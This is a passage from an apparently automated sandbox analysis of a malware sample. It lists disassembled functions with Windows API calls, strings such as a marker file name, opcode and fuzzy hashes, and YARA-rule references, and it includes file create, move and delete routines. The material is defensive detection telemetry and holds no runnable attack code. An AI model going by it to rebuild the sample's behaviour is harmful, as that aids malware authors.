                                                                                      • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                      • String ID:
                                                                                      • API String ID: 2560635915-0
                                                                                      • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                      • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0043B6FF, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0043B70B
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _free.LIBCMT ref: 0043B71E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 1020059152-0
                                                                                      • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                      • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041F070, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                      • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041E500, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                      • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00414160, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                      • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00425341, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wcsnlen
                                                                                      • String ID: U
                                                                                      • API String ID: 3628947076-3372436214
                                                                                      • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                      • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0045AD50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                      • API String ID: 2102423945-2013712220
                                                                                      • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                      • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C5C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: StringUuid$CreateFree
                                                                                      • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                      • API String ID: 3044360575-2335240114
                                                                                      • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                      • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C470, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                      • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C420, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendDeleteFileFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 610490371-2616962270
                                                                                      • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                      • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ECB0, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove_strtok
                                                                                      • String ID:
                                                                                      • API String ID: 3446180046-0
                                                                                      • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                      • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                      • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                      • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00422130, Relevance: 6.2, APIs: 4, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 2974526305-0
                                                                                      • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                      • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                      • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                      • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0043C677, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                      • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                      • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                      • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                      • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040F0E0, Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleWritelstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 1421093161-0
                                                                                      • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                      • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                      • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                      • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004C7094, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                        • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                        • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                      • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                      • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 2901542994-0
                                                                                      • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                      • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                      • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                      • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004253B3, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                        • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                      • __calloc_crt.LIBCMT ref: 00425A01
                                                                                        • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                      • __lock.LIBCMT ref: 00425A37
                                                                                      • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                      • __lock.LIBCMT ref: 00425A57
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                      • String ID:
                                                                                      • API String ID: 2580527540-0
                                                                                      • Opcode ID: 56ddee5d44e6f7a0727bbfe56c98386f43bba55fcc517f11197347c165fc7d9b
                                                                                      • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                      • Opcode Fuzzy Hash: 56ddee5d44e6f7a0727bbfe56c98386f43bba55fcc517f11197347c165fc7d9b
                                                                                      • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004409B9, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                      • String ID:
                                                                                      • API String ID: 3016257755-0
                                                                                      • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                      • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                      • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                      • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004127A0, Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32 ref: 004127B9
                                                                                      • _malloc.LIBCMT ref: 004127C3
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _memset.LIBCMT ref: 004127CE
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2824100046-0
                                                                                      • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                      • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                      • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                      • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412800, Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32 ref: 00412806
                                                                                      • _malloc.LIBCMT ref: 00412814
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _memset.LIBCMT ref: 0041281F
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2824100046-0
                                                                                      • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                      • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                      • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                      • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00414920, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                      • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                      • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                      • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041B185, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                        • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                        • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                        • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                        • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                        • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                        • Part of subcall function 0041BA10: RegisterClassExW.USER32 ref: 0041BA73
